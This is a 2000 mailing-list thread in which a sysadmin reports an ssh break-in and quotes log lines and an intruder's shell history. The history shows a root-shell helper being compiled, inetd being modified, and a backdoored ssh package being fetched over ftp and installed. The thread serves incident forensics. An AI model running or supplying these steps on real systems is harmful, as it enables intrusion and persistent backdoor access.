of course you installed every security update that redhat released
correct?
On Sun, 2 Jan 2000, Michael Hatchard wrote:
> To All
>
> Someone has hacked into our system.
>
> I'm not quite sure how he is getting in.
>
> But here is some info from my logs.
>
> It looks like it starts here from my guess
> machine admin (software testing machine)
> Redhat 6.0
> ssh 1.2.27-5i
>
> Dec 31 01:25:31 admin sshd connect from 194.109.6.45 port 58440
> Dec 31 01:25:40 admin sshd fatal: Did not receive ident string
> Dec 31 01:26:45 admin sshd connect from 194.109.6.45 port 58445
> Dec 31 01:26:45 admin sshd fatal: Local: This server does not support your new ssh
>version
> Dec 31 01:26:46 admin sshd connect from 194.109.6.45 port 1009
> Dec 31 01:26:58 admin sshd fatal: Connection closed by remote
> Dec 31 01:26:58 admin PAM_pwdb 2 authentication failures; (uid=0) => mhatch for ssh
>service
> Another 2 attempts at 01:30:03 and 01:30:04 at ports 58454 and 1009
> Dec 31 01:30:06 admin sshd log: Unknown group id 530
> Dec 31 01:30:07 admin PAM_pwdb get passwd; pwdb: structure is no longer valid
> As line above at 01:30:17 and 01:30:21
> Another connection at 01:44:02 then again at 05:50:23 05:50:27
> Dec 31 05:50:49 admin sshd fatal: Could not load host key: /etc/ssh_host_key. Check
>path and permission's
>
> In the tmp dir I found
> .bash_history Dec 31 05:53 with
> id
> rm -rf /dev/...
> w
> exit
> pico
> cc -o uid uid.c
> ./uid
> exit
> ./uid
> ls
> rm -rf rc
> cd /usr/bin
> ls -al |grep crontab
> ls
> cd /tmp
> ls
> pico /etc/inetd.conf
> killall -9 inetd
> /usr/bin/inetd
> pico /etc/inetd.conf
> killall -9 inetd
> /usr/bin/inetd
> ftp linux.tai.com.pl
> gzip -d ssh*
> tar -xvf ssh*
> cd ssh*
> ./setup.sh m4c3r0x 1.2.27
> ./configure;make
> ls
> cd ..
> rm -rf ssh*
> ftp linux.tai.com.pl
> ls
>
> >From here on her just moves sshd and changes it's permissions and later exits system
>
> File uid.c contains
> #include <unistd.h>
> main ()
> {
> setguid(0)
> setuid(0)
> excel("/bin/sh","/bin/sh",NULL);
> }
>
> There are also new config files for ssh in /etc
>
> He tries my email machine at Dec 31 06:46:37
> Redhat 5.0
> ssh 1.2.26-4i
> Same IP number but PAM_pwdb (su) session opened fro user bla by bla2(uid=0)
> There is a .bash_history file again in tmp Dec 31 07:02 with simular info as above.
> New ssh config files in /etc
>
> He logs into my name server/proxy machine at Dec 31 14:48:56
> Redhat 5.0
> ssh 1.2.26-4i
> Same IP number and same info in .bash_history file and new ssh config files in etc
>
> How can I keep this person out of our system??
>
>
> Thanks
> Michael
>
>
> --
> To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
> as the Subject.
>
-----------------------------------------------------
Brian Feeny (BF304) [EMAIL PROTECTED]
318-222-2638 x 109 http://www.shreve.net/~signal
Network Administrator ShreveNet Inc. (ASN 11881)
--
To unsubscribe: mail [EMAIL PROTECTED] with "unsubscribe"
as the Subject.
